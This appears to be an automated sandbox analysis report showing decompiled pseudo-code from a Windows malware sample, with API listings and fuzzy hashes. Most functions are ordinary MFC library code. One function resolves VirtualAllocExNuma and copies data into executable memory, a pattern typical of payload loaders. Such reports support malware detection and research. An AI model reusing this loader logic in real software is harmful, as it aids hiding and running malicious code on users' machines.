                                            							_t23 = E00405667(E00405A40(_t74) + 1);
                                            							 *0x439fbc = _t23;
                                            							if(_t23 == 0) {
                                            								goto L41;
                                            							} else {
                                            								E00409B00(_t23, _t74);
                                            								E00407A35(_t70);
                                            								E0040AD30( *0x4373bc, _t74, 3);
                                            								_t27 =  *0x4373bc; // 0x43733c
                                            								_t76 = _t74 + 3;
                                            								_t27[3] = _t27[3] & 0x00000000;
                                            								if( *_t76 == 0x2d) {
                                            									_v12 = 1;
                                            									_t76 = _t76 + 1;
                                            								}
                                            								_t60 = E004068F6(_t56, _t76) * 0xe10;
                                            								 *0x437330 = _t60;
                                            								while(1) {
                                            									_t29 =  *_t76;
                                            									if(_t29 != 0x2b && (_t29 < 0x30 || _t29 > 0x39)) {
                                            										break;
                                            									}
                                            									_t76 = _t76 + 1;
                                            								}
                                            								if( *_t76 == 0x3a) {
                                            									_t76 = _t76 + 1;
                                            									_t32 = E004068F6(_t60, _t76);
                                            									_t63 =  *0x437330; // 0x7080
                                            									_t60 = _t63 + _t32 * 0x3c;
                                            									 *0x437330 = _t60;
                                            									while(1) {
                                            										_t34 =  *_t76;
                                            										if(_t34 < 0x30 || _t34 > 0x39) {
                                            											break;
                                            										}
                                            										_t76 = _t76 + 1;
                                            									}
                                            									if( *_t76 == 0x3a) {
                                            										_t76 = _t76 + 1;
                                            										_t35 = E004068F6(_t60, _t76);
                                            										_t65 =  *0x437330; // 0x7080
                                            										_t60 = _t65 + _t35;
                                            										 *0x437330 = _t60;
                                            										while(1) {
                                            											_t36 =  *_t76;
                                            											if(_t36 < 0x30 || _t36 > 0x39) {
                                            												goto L36;
                                            											}
                                            											_t76 = _t76 + 1;
                                            										}
                                            									}
                                            								}
                                            								L36:
                                            								if(_v12 != 0) {
                                            									 *0x437330 =  ~_t60;
                                            								}
                                            								_t30 =  *_t76;
                                            								 *0x437334 = _t30;
                                            								if(_t30 == 0) {
                                            									goto L40;
                                            								} else {
                                            									E0040AD30( *0x4373c0, _t76, 3);
                                            									_t18 =  *0x4373c0; // 0x43737c
                                            									_t18[3] = _t18[3] & 0x00000000;
                                            								}
                                            							}
                                            						} else {
                                            							_t37 = E00409A70(_t74, _t19);
                                            							_pop(_t56);
                                            							if(_t37 == 0) {
                                            								goto L41;
                                            							} else {
                                            								goto L18;
                                            							}
                                            						}
                                            					}
                                            				} else {
                                            					E00407A35(_t70);
                                            					 *_t80 = 0x439f10;
                                            					_t18 = GetTimeZoneInformation(??);
                                            					if(_t18 != 0xffffffff) {
                                            						_t39 =  *0x439f10; // 0x0
                                            						_t67 =  *0x439f64; // 0x0
                                            						_t40 = _t39 * 0x3c;
                                            						_t86 =  *0x439f56; // 0x0
                                            						_t68 = 1;
                                            						 *0x437330 = _t40;
                                            						 *0x439f08 = _t68;
                                            						if(_t86 != 0) {
                                            							 *0x437330 = _t40 + _t67 * 0x3c;
                                            						}
                                            						_t88 =  *0x439faa; // 0x0
                                            						if(_t88 == 0) {
                                            							L7:
                                            							 *0x437334 = 0;
                                            							 *0x437338 = 0;
                                            						} else {
                                            							_t47 =  *0x439fb8; // 0x0
                                            							if(_t47 == 0) {
                                            								goto L7;
                                            							} else {
                                            								 *0x437334 = _t68;
                                            								 *0x437338 = (_t47 - _t67) * 0x3c;
                                            							}
                                            						}
                                            						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f14, 0xffffffff,  *0x4373bc, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                                            							_t43 =  *0x4373bc; // 0x43733c
                                            							 *_t43 =  *_t43 & 0x00000000;
                                            						} else {
                                            							_t46 =  *0x4373bc; // 0x43733c
                                            							_t46[0x3f] = _t46[0x3f] & 0x00000000;
                                            						}
                                            						if(WideCharToMultiByte( *0x439efc, 0x220, 0x439f68, 0xffffffff,  *0x4373c0, 0x3f, 0,  &_v8) == 0 || _v8 != 0) {
                                            							L40:
                                            							_t18 =  *0x4373c0; // 0x43737c
                                            							 *_t18 =  *_t18 & 0x00000000;
                                            						} else {
                                            							_t18 =  *0x4373c0; // 0x43737c
                                            							_t18[0x3f] = _t18[0x3f] & 0x00000000;
                                            						}
                                            					}
                                            				}
                                            				return _t18;
                                            			}




































                                            APIs
                                              • Part of subcall function 004079D4: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A11
                                              • Part of subcall function 004079D4: EnterCriticalSection.KERNEL32(?,?,?,00407369,00000009,?,?,?,00408E0B,00000001,00000074,?,004063F8), ref: 00407A2C
                                              • Part of subcall function 00407A35: LeaveCriticalSection.KERNEL32(?,004056C9,00000009,?,00000009,00000000,?,00405689,000000E0,00405676,?,004079F4,00000018,00000000,?), ref: 00407A42
                                            • GetTimeZoneInformation.KERNEL32(0000000C,?,00000000,-0000076C,0000000B,0000000B,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A5D4
                                            • WideCharToMultiByte.KERNEL32(00000220,00439F14,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A66A
                                            • WideCharToMultiByte.KERNEL32(00000220,00439F68,000000FF,0000003F,00000000,?,?,0040A577,00408FB5,?,?,?,?,004062D2,?,?), ref: 0040A6A3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                            • String ID: <sC$|sC
                                            • API String ID: 3442286286-4181122796
                                            • Opcode ID: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
                                            • Instruction ID: b677b28e1722a814c3f057f402e4873ea4966b7f4bec670f8581aa156dfe752d
                                            • Opcode Fuzzy Hash: 95382b0c2674745cc3224bc5266e28e0c8a256173c61d84ba7f422d0d13868bb
                                            • Instruction Fuzzy Hash: BC61D7B15083409AD7319F29AC85B6A3BA9E701314F24613FFCC1A72E1D7788D62D75E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00413E4C(intOrPtr* __ecx) {
                                            				struct HWND__* _v36;
                                            				struct HWND__* _v40;
                                            				signed char _v44;
                                            				void* _v48;
                                            				long _t33;
                                            				long _t41;
                                            				struct HWND__* _t46;
                                            				signed char _t58;
                                            				intOrPtr* _t61;
                                            				signed int _t62;
                                            				void* _t67;
                                            				intOrPtr _t69;
                                            				intOrPtr* _t70;
                                            
                                            				_t70 = __ecx;
                                            				_t67 = E004126FB();
                                            				if(_t67 != 0) {
                                            					if( *((intOrPtr*)(_t67 + 0x1c)) == __ecx) {
                                            						 *((intOrPtr*)(_t67 + 0x1c)) = 0;
                                            					}
                                            					if( *((intOrPtr*)(_t67 + 0x20)) == _t70) {
                                            						 *((intOrPtr*)(_t67 + 0x20)) = 0;
                                            					}
                                            				}
                                            				_t61 =  *((intOrPtr*)(_t70 + 0x30));
                                            				if(_t61 != 0) {
                                            					 *((intOrPtr*)( *_t61 + 0x50))();
                                            					 *((intOrPtr*)(_t70 + 0x30)) = 0;
                                            				}
                                            				_t62 =  *(_t70 + 0x34);
                                            				_t58 = 1;
                                            				if(_t62 != 0) {
                                            					 *((intOrPtr*)( *_t62 + 4))(_t58);
                                            				}
                                            				 *(_t70 + 0x34) =  *(_t70 + 0x34) & 0x00000000;
                                            				if(( *(_t70 + 0x24) & _t58) != 0) {
                                            					_t69 =  *((intOrPtr*)(E004249C4() + 0xcc));
                                            					if(_t69 != 0 &&  *(_t69 + 0x1c) != 0) {
                                            						E00406330( &_v48, 0, 0x2c);
                                            						_t46 =  *(_t70 + 0x1c);
                                            						_v40 = _t46;
                                            						_v36 = _t46;
                                            						_v48 = 0x28;
                                            						_v44 = _t58;
                                            						SendMessageA( *(_t69 + 0x1c), 0x405, 0,  &_v48);
                                            					}
                                            				}
                                            				_t33 = GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc);
                                            				E004136A7(_t70);
                                            				if(GetWindowLongA( *(_t70 + 0x1c), 0xfffffffc) == _t33) {
                                            					_t41 =  *( *((intOrPtr*)( *_t70 + 0x80))());
                                            					if(_t41 != 0) {
                                            						SetWindowLongA( *(_t70 + 0x1c), 0xfffffffc, _t41);
                                            					}
                                            				}
                                            				E004137BE(_t70);
                                            				return  *((intOrPtr*)( *_t70 + 0xa4))();
                                            			}
















                                            APIs
                                            • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00413F05
                                            • GetWindowLongA.USER32 ref: 00413F16
                                            • GetWindowLongA.USER32 ref: 00413F26
                                            • SetWindowLongA.USER32 ref: 00413F42
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: LongWindow$MessageSend
                                            • String ID: (
                                            • API String ID: 2178440468-3887548279
                                            • Opcode ID: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
                                            • Instruction ID: dd2e24bc71a940e73787925e98583bd3eaf246f1b6150e13293b1a1c05b6b2eb
                                            • Opcode Fuzzy Hash: b7860b0334c69e628a48f58358d5d69417b13256e34788ada7969d26880b0dcf
                                            • Instruction Fuzzy Hash: 3131C1306003109FDB20AF69D884BAEBBB4BF44315F10416EE54297791DB79ED85CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 85%
                                            			E004264D7(void* __ecx, void* __eflags) {
                                            				CHAR* _v8;
                                            				char _v268;
                                            				char _v528;
                                            				char _v784;
                                            				void* __ebp;
                                            				signed char* _t35;
                                            				intOrPtr _t39;
                                            				intOrPtr _t43;
                                            				CHAR* _t54;
                                            				void* _t62;
                                            				intOrPtr* _t63;
                                            				void* _t64;
                                            
                                            				_t55 = __ecx;
                                            				_t64 = __ecx;
                                            				_t62 = E00424BFB();
                                            				 *(_t62 + 8) =  *(_t64 + 0x68);
                                            				 *(_t62 + 0xc) =  *(_t64 + 0x68);
                                            				GetModuleFileNameA( *(_t64 + 0x68),  &_v528, 0x104);
                                            				_t35 = E004072C1(_t55,  &_v528, 0x2e);
                                            				 *_t35 =  *_t35 & 0x00000000;
                                            				_v8 = _t35;
                                            				E004265F4( &_v528,  &_v268, 0x104);
                                            				if( *((intOrPtr*)(_t64 + 0x88)) == 0) {
                                            					 *((intOrPtr*)(_t64 + 0x88)) = E004065EE( &_v268);
                                            				}
                                            				if( *((intOrPtr*)(_t64 + 0x78)) == 0) {
                                            					if(E00417298(0xe000,  &_v784, 0x100) == 0) {
                                            						_push( *((intOrPtr*)(_t64 + 0x88)));
                                            					} else {
                                            						_push( &_v784);
                                            					}
                                            					 *((intOrPtr*)(_t64 + 0x78)) = E004065EE();
                                            				}
                                            				_t39 =  *((intOrPtr*)(_t64 + 0x78));
                                            				 *((intOrPtr*)(_t62 + 0x10)) = _t39;
                                            				_t63 = _t64 + 0x8c;
                                            				if( *((intOrPtr*)(_t64 + 0x8c)) == 0) {
                                            					_t54 = _v8;
                                            					lstrcpyA(_t54, ".HLP");
                                            					_t39 = E004065EE( &_v528);
                                            					 *_t63 = _t39;
                                            					 *_t54 =  *_t54 & 0x00000000;
                                            				}
                                            				if( *((intOrPtr*)(_t64 + 0x90)) == 0) {
                                            					lstrcatA( &_v268, ".INI");
                                            					_t43 = E004065EE( &_v268);
                                            					 *((intOrPtr*)(_t64 + 0x90)) = _t43;
                                            					return _t43;
                                            				}
                                            				return _t39;
                                            			}















                                            APIs
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
                                              • Part of subcall function 004265F4: lstrlenA.KERNEL32(00000104,00000000,?,00426538), ref: 0042662B
                                            • lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
                                            • lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                            • String ID: .HLP$.INI
                                            • API String ID: 2421895198-3011182340
                                            • Opcode ID: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
                                            • Instruction ID: 868c022bf07a7b2e93be295e1be440ce3fbd708987d9fcb65685db64fa447996
                                            • Opcode Fuzzy Hash: 03e9000f74707ee1fefe1168fab3d886596b8c1f978c46023b90c1e0bddbb18a
                                            • Instruction Fuzzy Hash: 31316071904718AFDB21DB75EC85B86B7FCAB04304F5049ABE18AD3141DB74AAC4CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041BA5F(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
                                            				struct HWND__* _v8;
                                            				int _v12;
                                            				struct HWND__* _v16;
                                            				intOrPtr _v20;
                                            				char _v280;
                                            				struct HWND__* _t23;
                                            				signed int _t32;
                                            				intOrPtr _t34;
                                            				long _t36;
                                            				int _t38;
                                            				intOrPtr _t41;
                                            				CHAR* _t42;
                                            				int _t43;
                                            				long _t44;
                                            
                                            				_t41 = __ecx;
                                            				_v20 = __ecx;
                                            				E0041BA31(0);
                                            				_t23 = E0041BBD7(0,  &_v8);
                                            				_t44 = 0;
                                            				_v16 = _t23;
                                            				if(_t23 == 0) {
                                            					L3:
                                            					if(_t41 != 0) {
                                            						_t5 = _t41 + 0x9c; // 0x9c
                                            						_t44 = _t5;
                                            					}
                                            					L5:
                                            					_v12 = 0;
                                            					if(_t44 != 0) {
                                            						_v12 =  *_t44;
                                            						_t34 = _a12;
                                            						if(_t34 != 0) {
                                            							 *_t44 = _t34 + 0x30000;
                                            						}
                                            					}
                                            					_t38 = _a8;
                                            					if((_t38 & 0x000000f0) == 0) {
                                            						_t32 = _t38 & 0x0000000f;
                                            						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
                                            							_t38 = _t38 | 0x00000030;
                                            						}
                                            					}
                                            					if(_t41 == 0) {
                                            						_t42 =  &_v280;
                                            						GetModuleFileNameA(0,  &_v280, 0x104);
                                            					} else {
                                            						_t42 =  *(_t41 + 0x78);
                                            					}
                                            					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
                                            					if(_t44 != 0) {
                                            						 *_t44 = _v12;
                                            					}
                                            					if(_v8 != 0) {
                                            						EnableWindow(_v8, 1);
                                            					}
                                            					E0041BA31(1);
                                            					return _t43;
                                            				}
                                            				_t36 = SendMessageA(_v8, 0x376, 0, 0);
                                            				if(_t36 == 0) {
                                            					goto L3;
                                            				} else {
                                            					_t44 = _t36;
                                            					goto L5;
                                            				}
                                            			}

















                                            APIs
                                              • Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
                                              • Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
                                              • Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
                                              • Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41
                                            • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041BA95
                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
                                            • MessageBoxA.USER32 ref: 0041BB11
                                            • EnableWindow.USER32(00000000,00000001), ref: 0041BB2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                            • String ID: ]hA
                                            • API String ID: 1958756768-937096280
                                            • Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
                                            • Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
                                            • Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
                                            • Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
                                            				void* __ebp;
                                            				void* _t29;
                                            				int _t30;
                                            				void* _t35;
                                            				void* _t38;
                                            				intOrPtr* _t40;
                                            				int _t42;
                                            				intOrPtr* _t45;
                                            				void* _t46;
                                            
                                            				_t45 = __ecx;
                                            				_t29 = E00414DCC(__ecx);
                                            				_t40 =  *((intOrPtr*)(_t45 + 0x68));
                                            				_t42 = _a4;
                                            				_t38 = _t29;
                                            				if(_t40 == 0) {
                                            					L2:
                                            					if(_a8 != 0xffff) {
                                            						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
                                            							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
                                            							goto L17;
                                            						} else {
                                            							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
                                            								if(_t42 < 0xff00) {
                                            									goto L13;
                                            								}
                                            								 *(_t45 + 0x90) = 0xef1f;
                                            								goto L17;
                                            							} else {
                                            								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
                                            								L13:
                                            								 *(_t45 + 0x90) = _t42;
                                            								L17:
                                            								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
                                            								L18:
                                            								_t30 =  *(_t45 + 0x90);
                                            								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
                                            									L21:
                                            									return _t30;
                                            								}
                                            								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
                                            								if(_t30 == 0) {
                                            									goto L21;
                                            								}
                                            								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                                            							}
                                            						}
                                            					}
                                            					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
                                            					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
                                            						 *(_t45 + 0x90) = 0xe002;
                                            					} else {
                                            						 *(_t45 + 0x90) = 0xe001;
                                            					}
                                            					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
                                            					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
                                            					if(_t35 != 0) {
                                            						UpdateWindow( *(_t35 + 0x1c));
                                            					}
                                            					goto L18;
                                            				}
                                            				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                                            				if(_t30 != 0) {
                                            					goto L21;
                                            				}
                                            				goto L2;
                                            			}













                                            APIs
                                            • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00421A41
                                            • UpdateWindow.USER32(?), ref: 00421A58
                                            • GetParent.USER32(?), ref: 00421AC3
                                            • PostMessageA.USER32 ref: 00421ADF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: Message$ParentPostSendUpdateWindow
                                            • String ID: @
                                            • API String ID: 4141989945-2766056989
                                            • Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
                                            • Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
                                            • Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
                                            • Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                            				struct _WNDCLASSA _v44;
                                            				void* __ebp;
                                            				void* _t25;
                                            				void* _t34;
                                            				intOrPtr _t37;
                                            				struct HINSTANCE__* _t40;
                                            				CHAR* _t42;
                                            
                                            				_t42 = E004249C4() + 0x58;
                                            				_t25 = E00424BFB();
                                            				_t37 = _a8;
                                            				_t40 =  *(_t25 + 8);
                                            				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
                                            					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
                                            				} else {
                                            					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
                                            				}
                                            				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
                                            					_v44.style = _a4;
                                            					_v44.lpfnWndProc = DefWindowProcA;
                                            					_v44.cbWndExtra = 0;
                                            					_v44.cbClsExtra = 0;
                                            					_v44.lpszMenuName = 0;
                                            					_v44.hIcon = _a16;
                                            					_push( &_v44);
                                            					_v44.hInstance = _t40;
                                            					_v44.hCursor = _t37;
                                            					_v44.hbrBackground = _a12;
                                            					_v44.lpszClassName = _t42;
                                            					_t34 = E004142C3();
                                            					_t50 = _t34;
                                            					if(_t34 == 0) {
                                            						E0041A6C8(_t50);
                                            					}
                                            				}
                                            				return _t42;
                                            			}











                                            APIs
                                            Strings
                                            Similarity
                                            • API ID: wsprintf$ClassInfo
                                            • String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
                                            • API String ID: 845911565-79760390
                                            • Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
                                            • Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
                                            • Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
                                            • Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
                                            				void* _t10;
                                            				void* _t11;
                                            				struct HWND__* _t13;
                                            				struct HWND__* _t16;
                                            				struct HWND__** _t23;
                                            				void* _t24;
                                            
                                            				_t23 = _a4;
                                            				_t24 = __ecx;
                                            				if(E00414007(__ecx, _t23) != 0) {
                                            					L12:
                                            					_t10 = 1;
                                            					return _t10;
                                            				}
                                            				_t11 = E00414DCC(__ecx);
                                            				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
                                            					if(_t23[1] != 0x100) {
                                            						L13:
                                            						return E00415EEB(_t23);
                                            					}
                                            					_t13 = _t23[2];
                                            					if(_t13 == 0x1b || _t13 == 3) {
                                            						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
                                            							goto L13;
                                            						} else {
                                            							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
                                            							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
                                            								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
                                            								goto L12;
                                            							} else {
                                            								goto L13;
                                            							}
                                            						}
                                            					} else {
                                            						goto L13;
                                            					}
                                            				} else {
                                            					return 0;
                                            				}
                                            			}










                                            APIs
                                            • GetWindowLongA.USER32 ref: 00411BF8
                                            • GetDlgItem.USER32 ref: 00411C17
                                            • IsWindowEnabled.USER32(00000000), ref: 00411C22
                                            • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00411C38
                                            Strings
                                            Similarity
                                            • API ID: Window$EnabledItemLongMessageSend
                                            • String ID: Edit
                                            • API String ID: 3499652902-554135844
                                            • Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
                                            • Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
                                            • Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
                                            • Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 43%
                                            			E004012BE(intOrPtr _a4, intOrPtr _a8) {
                                            				struct HINSTANCE__* _v8;
                                            				struct HINSTANCE__* _v12;
                                            				struct HINSTANCE__** _t11;
                                            
                                            				_v12 = 0;
                                            				_v8 = 0;
                                            				_t11 =  &_v8;
                                            				_push(_t11);
                                            				_push("kernel32.dll");
                                            				_push(0);
                                            				L0040C36A();
                                            				if(_t11 != 0) {
                                            					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
                                            					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
                                            					E00405700(_v12, _a4, _a8);
                                            				}
                                            				return _v12;
                                            			}







                                            APIs
                                            • GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
                                            • GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309
                                            Strings
                                            Similarity
                                            • API ID: AddressCurrentHandleModuleProcProcess
                                            • String ID: VirtualAllocExNuma$kernel32.dll
                                            • API String ID: 4190356694-3151700105
                                            • Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
                                            • Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
                                            • Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
                                            • Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E0041A2AB(void* __ecx, intOrPtr _a4) {
                                            				struct HINSTANCE__* _t4;
                                            				_Unknown_base(*)()* _t5;
                                            				void* _t9;
                                            				void* _t10;
                                            
                                            				_t10 = __ecx;
                                            				_t4 = GetModuleHandleA("GDI32.DLL");
                                            				_t9 = 0;
                                            				_t5 = GetProcAddress(_t4, "SetLayout");
                                            				if(_t5 == 0) {
                                            					if(_a4 != 0) {
                                            						_t9 = 0xffffffff;
                                            						SetLastError(0x78);
                                            					}
                                            				} else {
                                            					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                                            				}
                                            				return _t9;
                                            			}








                                            APIs
                                            • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
                                            • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
                                            • SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4
                                            Strings
                                            Similarity
                                            • API ID: AddressErrorHandleLastModuleProc
                                            • String ID: GDI32.DLL$SetLayout
                                            • API String ID: 4275029093-2147214759
